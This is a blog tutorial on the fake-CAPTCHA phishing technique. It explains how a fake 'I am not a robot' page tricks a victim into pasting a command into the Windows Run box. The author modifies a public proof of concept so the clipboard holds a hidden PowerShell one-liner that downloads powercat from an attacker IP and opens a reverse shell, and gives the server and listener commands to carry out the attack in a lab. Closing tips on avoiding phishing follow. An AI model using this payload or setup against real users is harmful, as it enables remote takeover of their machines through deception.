Hacking Windows with Fake Captchas

In recent weeks, cybersecurity researchers at various companies spotted a new type of phishing attack involving those pesky re-captchas.

Originally, reCAPTCHA is a security tool designed to differentiate between human users and automated bots on websites. However, hackers in the wild were using them to social engineer the victim and run malicious powershell scripts on the target systems. Let’s see how it works in detail.

The Working of Fake Captchas:

• First the victim is prompted with a fake re-captcha with the classic “I am not a Robot” checkbox.

• Once the user, clicks on it. Another pop-up jumps on the screen and showcase some verification steps.

• The verification steps include – opening up a Windows Run box with “Windows+R” and “CTRL+V” to paste the copied string. Once “Enter” is hit by the target, its GAME OVER !!!

• The base64 encoded powershell string then downloads a HTA (HTML Application) file from a remote server and executes an infostealer malware like LummaStealer on the target.

Performing the Attack:

Downloading and Analyzing the POC

Now to perform this attack, we will use the POC published by John Hammond on his github.

John’s POC: https://github.com/JohnHammond/recaptcha-phish

• We will first download the POC on our kali machine. It contains two files – index.html and recaptcha-verify.

git clone https://github.com/JohnHammond/recaptcha-phish.git

cd recaptcha-phish

ls

• Let’s look into the index.html file. I will use mousepad, use any editor of your choice.

mousepad index.html

• Alright, so as we can see, the stageClipboard function is taking two arguments commandToRun and VerificationID. Further, there are some variable that are initialized like suffix, ploy, end, textToCopy. Out of these, the first three are related to the social engineering part where we are using a disguise of some verification ID. But the textToCopy variable is taking values of all the variable including commandToRun and sending it to the function setClipboardCopyData.

• Next, the funtion showVerifyWindow is doing something interesting. there is a variable there named htaPath which is taking the server’s IP address using “window.location.origin” JS property and adding it with recaptcha-verify HTA file which is included with the POC. Post that, the commandTorun variable is running mshta command with the htaPath to execute the social engineering facade after the payload is executed on the systema and pop-up the calculator app.

Making changes to POC

• Now to support our needs of getting a reverse shell access on the target, i have made some changes to the index.html file. Firstly, i have added a revshell variable in stageClipboard function that uses powershell one liner to download powercat reverse shell script on the target and will then execute it to grant us shell access on out port 6666.

• Those of you who don’t what powercat is. So, Powercat is a PowerShell tool that simplifies network communication tasks, similar to the well-known utility Netcat but designed specifically for Windows environments.

Powercat: https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

function stageClipboard(commandToRun, verification_id){
            const revshell = "powershell.exe -ep bypass -W hidden IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.29.160:8080/powercat.ps1');powercat -c 192.168.29.160 -p 6666 -e powershell; "
            const suffix = " # "
            const ploy = "✅ ''I am not a robot: "
            const end = "''"
            const textToCopy = revshell + commandToRun + suffix + ploy + verification_id + end

            setClipboardCopyData(textToCopy);

Burning down the Windows

• So, at last we are ready with our modified POC. Let’s spawn a webserver on port 8000 using python to host our index.html file.

python3 -m http.server

• Spawning another server on port 8080 for our powercat.ps1 script.

python3 -m http.server 8080

• Next, making our netcat listener ready on port 6666 for incoming connections.

nc -lvnp 6666

• Now coming to the target, we have a Windows 10 virtual machine over here. Let’s open up google chrome on it and launch our webserver running on port 8000. We got a fake Captcha page!

• Now, if i click on to verify myself. I am prompted with some verification steps. Firstly, i have to open up Windows Run Dialog box using “Win+R” and the “CTRL+V” and here we can see the “I am not a Robot with a Verification ID”. I have also made a little changes to this set of strings due to length constraint in Windows Run box. Now, if i hit enter and BOOM! We got a connection at our netcat listener. That means, we have successfully hacked the target.

Also Read: Vulnab – Media

Conclusion:

In conclusion, the demonstration of hacking Windows using fake captchas, particularly through the proof of concept (POC) provided by John Hammond, highlights a rather amusing yet concerning vulnerability in user behavior and security awareness. This attack exploits the tendency of users to trust familiar interfaces, even when they are fake. While it may seem somewhat silly that individuals can be tricked by something as simple as a fake captcha, it underscores the importance of vigilance in our digital interactions.To protect against such attacks, users should adopt several best practices:

• Verify URLs: Always check the URL of the website you are interacting with. Ensure it’s legitimate and secure (look for HTTPS).

• Educate Yourself: Understanding common phishing tactics can help you recognize suspicious activities.

• Use Security Tools: Employ browser extensions and security software that can detect and warn against phishing attempts.

• Report Suspicious Activity: If you encounter a fake captcha or other suspicious elements online, report them to the appropriate authorities or platforms.

Ultimately, while the concept of hacking through fake captchas may seem trivial or even humorous, it serves as a reminder of the ongoing battle between cybersecurity measures and user awareness. By staying informed and cautious, we can better defend ourselves against these seemingly silly yet potentially harmful attacks. On that note, i will take your leave, till then “Keep Hacking”.